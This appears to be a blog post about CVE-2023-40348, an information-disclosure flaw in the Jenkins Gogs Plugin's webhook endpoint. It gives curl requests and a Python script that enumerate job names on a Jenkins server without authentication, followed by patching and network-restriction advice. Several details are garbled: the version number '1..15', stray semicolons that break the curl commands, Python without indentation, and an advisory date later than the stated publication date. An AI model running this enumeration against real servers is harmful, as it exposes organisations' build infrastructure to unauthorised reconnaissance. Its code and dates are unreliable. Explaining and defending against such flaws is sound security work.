CVE-2023-40348 - Inside Jenkins Gogs Plugin Info Disclosure Flaw (With Exploit Example)
CVE-2023-40348 is an information disclosure vulnerability found in the Jenkins Gogs Plugin, specifically versions 1..15 and earlier. This issue gives unauthenticated attackers the ability to discover the existence of jobs just by interacting with the webhook endpoint of the plugin. In this post, I’ll break down what the vulnerability is, show you a code example, and explain step-by-step how it can be exploited.
What Is The Jenkins Gogs Plugin?
The Jenkins Gogs Plugin link helps Jenkins users connect to Gogs, a self-hosted Git service. It allows Jenkins to listen for events from Gogs, such as code pushes, through a webhook endpoint.
About The Vulnerability
- The webhook endpoint in Jenkins Gogs Plugin (up to 1..15) fails to properly enforce authentication on certain requests.
- When an unauthenticated user sends a POST (or GET) request to the webhook endpoint, the plugin’s response includes details about whether a specific job exists in Jenkins.
- This allows attackers to enumerate job names — useful information for planning further attacks (like targeted exploits, social engineering, or identifying sensitive jobs).
Official Advisory
- Jenkins Security Advisory 2023-08-23
- NVD Entry for CVE-2023-40348
How Does The Exploit Work?
Suppose you’re running a vulnerable Jenkins with the Gogs Plugin enabled.
The vulnerable endpoint is usually found at
http://<jenkins-server>/gogs-webhook/post
The attacker can send a POST request with a crafted payload that references a job name, and Jenkins will respond differently depending on whether that job exists.
Example with curl
curl -X POST "http://jenkins.company.local/gogs-webhook/post?job=my-secret-job";
Or, if the server expects JSON
curl -X POST "http://jenkins.company.local/gogs-webhook/post"; \
-H "Content-Type: application/json" \
-d '{"job":"my-secret-job"}'
`
This difference tells the attacker whether or not a Jenkins job with that name exists, all without authentication.
2. Enumerating Jobs
An attacker can script requests with lists of probable job names (like backup, deploy-prod, test, secret-project, etc.) and automate the discovery of jobs.
Python Example: Job Enumerator
import requests
base_url = "http://jenkins.company.local/gogs-webhook/post?job={}";
job_list = ["backup", "deploy-prod", "build", "test", "secret-project"]
for job in job_list:
resp = requests.post(base_url.format(job))
if "does not exist" not in resp.text:
print(f"Job exists: {job}")
else:
print(f"Job not found: {job}")
Why Is This A Problem?
- Information Disclosure: Attackers can map out your Jenkins jobs, indirectly learning about your CI/CD workflow, environment, and even sensitive responsibilities assigned to specific jobs (like “database-backup” or “prod-deploy”).
- Precursor To Other Attacks: Knowing job names can make further attacks easier, especially if those jobs have weak security on build parameters, credential usage, or scripts.
How To Fix Or Defend
- Update Immediately: If you use Jenkins Gogs Plugin 1..15 or earlier, update to the latest version as soon as possible.
- Restrict Network Access: Do not expose Jenkins webhooks or the Jenkins UI to the public internet.
- API Gateway or Web Application Firewall: Use additional authentication and monitoring for endpoints like /gogs-webhook/post.
References
- Jenkins Security Advisory 2023-08-23 (SECURITY-3202)
- NVD Entry for CVE-2023-40348
- Gogs Plugin Page on Jenkins
- GitHub - Gogs Plugin Source Code
Final Thoughts
CVE-2023-40348 is a good reminder that “small” information leaks can add up to serious security risks. Even just learning the names of jobs in Jenkins could help attackers break into bigger parts of your software delivery chain.
Patch as soon as you can. Encourage your team to treat CI/CD services as production infrastructure, with strict access control and monitoring.
If you have more questions on Jenkins security, let me know in the comments!
Timeline
Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/18/2023 19:59:00 UTC